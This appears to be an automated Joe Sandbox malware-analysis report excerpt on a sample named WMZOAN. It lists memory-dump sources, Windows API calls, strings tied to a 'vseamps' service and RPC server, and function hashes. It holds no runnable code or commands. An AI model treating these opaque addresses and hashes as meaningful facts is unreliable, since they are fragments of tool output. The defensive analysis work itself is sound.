                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressFreeLibraryProc
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 3013587201-537541572
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                            • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                            • API String ID: 1119674940-1966266597
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrlen$ComputerName
                                            • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                            • API String ID: 3702919091-996641649
                                            APIs
                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$Info
                                            • String ID:
                                            • API String ID: 1775632426-0
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B071B1
                                            • GetLastError.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B071BF
                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B071E9
                                            • FreeLibrary.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B07257
                                            • GetProcAddress.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B07263
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Value$ErrorLast
                                            • String ID:
                                            • API String ID: 2506987500-0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            APIs
                                            • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                            • CreateEventW.KERNEL32 ref: 00000001400012C0
                                              • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                              • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                              • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                              • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                              • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                              • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                              • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                              • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                              • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                              • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                              • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                            • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                            • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                              • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                              • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                              • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                              • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                              • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                              • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                              • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                              • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                              • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                              • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                              • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                              • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                              • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                              • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                              • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                              • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                              • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                            • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                            • String ID: vseamps
                                            • API String ID: 3197017603-3944098904
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Messagesprintf_s
                                            • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                            • API String ID: 2642950106-3610746849
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            APIs
                                            • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                            • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                            • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: StringType$ByteCharMultiWide$ErrorLast
                                            • String ID:
                                            • API String ID: 319667368-0
                                            • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                            • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                            • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                            • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                            APIs
                                            • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                            • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                              • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                            • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                            • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                            • String ID:
                                            • API String ID: 1390108997-0
                                            • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                            • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                            • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                            • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 3523768491-393685449
                                            • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                            • Instruction ID: 7b2c76bb48ca57ebb40ccdd6a591b855a64f6aa99947e54b67314dbd7bae6525
                                            • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                            • Instruction Fuzzy Hash: A1E190B6A087C28AE7129F35D8C82AD77A0FB45748F184276DADD67A56DF38E481C700
                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B095CB
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B09601
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B0962E
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B0963F
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B09650
                                            • SetLastError.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B0966B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Value$ErrorLast
                                            • String ID:
                                            • API String ID: 2506987500-0
                                            • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                            • Instruction ID: 35238c8a1c117beeb3cc9dd2d6e724ced465c93e942b4306dcb6866649d9e683
                                            • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                            • Instruction Fuzzy Hash: 63115BA8B0C2C245FA56AB31DDD913D21629F587B0F4C43B5E8EE266E6EE2CE4418300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                            • String ID:
                                            • API String ID: 3326452711-0
                                            • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                            • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                            • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                            • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeaveTimerWaitable
                                            • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                            • API String ID: 2984211723-1229430080
                                            • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                            • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                            • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                            • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                            • Instruction ID: dfd45076b07fd7aa7fffdcdbc3af6f7ae73b58e8dd51c5819bd5e3b0d907ecdf
                                            • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                            • Instruction Fuzzy Hash: 0AF044A9F1968681EA128F34EC4D33DA320AF45761F580375CAED595E4DF2CD049C740
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                            • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                            • ExitProcess.KERNEL32 ref: 0000000140008545
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressExitHandleModuleProcProcess
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 75539706-1276376045
                                            • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                            • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                            • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                            • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                            • Instruction ID: 44a8e325e4d6143c12ec05646d2046e237ed5b52870968507412a13ae90b644c
